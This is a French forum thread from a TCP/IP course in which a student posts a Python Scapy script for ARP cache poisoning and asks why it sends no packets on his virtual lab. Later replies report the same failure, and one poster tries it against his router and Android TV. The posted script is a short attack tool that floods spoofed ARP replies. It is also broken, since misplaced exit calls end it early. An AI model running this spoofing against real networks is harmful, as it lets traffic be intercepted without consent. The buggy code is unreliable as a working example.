Partage
  • Partager sur Facebook
  • Partager sur Twitter

Cours tcp ip attaque arp

    14 février 2017 à 4:32:47

    Bonjour, je suis presentement rendu au point ou l'on dois effectuer une ARP cache poisonning sur une machine j'ai bien mes 3 machines virtuels

    Mes machines virtuels ne sont pas l'image recommander sur le site mais bien une image que jai clonner moi meme de ubuntu 16.0.4 LTS

    j'ai donc retranscrie le code python et downloader scapy

    J'ai eu plusieurs erreurs au niveau du code de python, probleme indentation en autre, prenez note que je connai quedale en python...

    avec quelque recherche j'ai ete capable (enfin je crois) de regler mes problemes indentation, quand je lance ma commandes

    "./arpcachepoison.py 192.168.0.1 192.168.0.2"

    (le commande es lancer de ma machine 193.168.0.3)

    il n'y a aucun paquets envoyer

    seulement la commande WARNING: No route found for IPv6 destination :: (no default route?)
     et je revien a ma ligne de commande , aucune erreurs aussi...

    le ping fonctionne sur les 3 machines, donc elle communique, j'ai regarder la table arp, apres avoir lancer la commande, et l'adresse MAC de 192.168.0.1 n'a pas changer

    Y aurai-t-il une erreurs dans le code et esque scapy dois etre installer sur les 3 machines ? car scapy es seulement installer sur ma machine ou j'effectue l'attaque sois 192.168.0.3

    voici le script python

    #!/usr/bin/python
    
    # Python arp poison example script
    
    # Written by aviran
    
    # visit for more details aviran.org
    
    
    from scapy.all import *
    import sys
    
    
    def get_mac_address():
        my_macs = [get_if_hwaddr(i) for i in get_if_list()]
        for mac in my_macs:
            if(mac != "00:00:00:00:00:00"):
                return mac
    Timeout=2
    
    
    if len(sys.argv) != 3:
        print "Usage: arp_poison.py HOST_TO_ATTACK HOST_TO_IMPERSONATE"
    sys.exit(1)
    
    
    my_mac = get_mac_address()
    if not my_mac:
        print "Cant get local mac address, quitting"
    sys.exit(1)
    
    packet = Ether()/ARP(op="who-has",hwsrc=my_mac,psrc=sys.argv[2],pdst=sys.argv[1])
    
    
    sendp(packet, loop=1, inter=0.2)



    -
    Edité par Linkzy 14 février 2017 à 4:37:07

    • Partager sur Facebook
    • Partager sur Twitter
      4 août 2017 à 2:04:14

      Salut un peu tard je pense , mais va sur le site indiquer en haut du script  , tune fois dessus trouve  " arp cache poison ''  et recopie le script du site , normalement c'est bon .
      • Partager sur Facebook
      • Partager sur Twitter
        6 août 2017 à 21:56:30

        Bonjour même probleme je n'arrive pas à faire fonctionner le scripte la version ubuntu est la même je n'arrive pas non plus à faire un copier coller quelle plaie !!!
        • Partager sur Facebook
        • Partager sur Twitter
          7 décembre 2018 à 11:18:31

          moi j'ai lancer le programme: ./arpcachepoison adresse routeur adresse cible

          sa fait des petits point, ensuite j’ai lancer la commande echo la...., et j’ai fait le tcpdump

          mais sa marche pas , j’ai essayer sur ma TV android, ou alors c'est avec le ping qui faut ecouter?

          si quelqun peut m'aider je suis un peut perdu je ne comprend pas le principe je crois ou meme

          si quelqun a des idee d'amelioration et surtout dire comment le programe fonctionne ce serai vraiment super

          merci

          • Partager sur Facebook
          • Partager sur Twitter

          Cours tcp ip attaque arp

          × Après avoir cliqué sur "Répondre" vous serez invité à vous connecter pour que votre message soit publié.
          × Attention, ce sujet est très ancien. Le déterrer n'est pas forcément approprié. Nous te conseillons de créer un nouveau sujet pour poser ta question.
          • Editeur
          • Markdown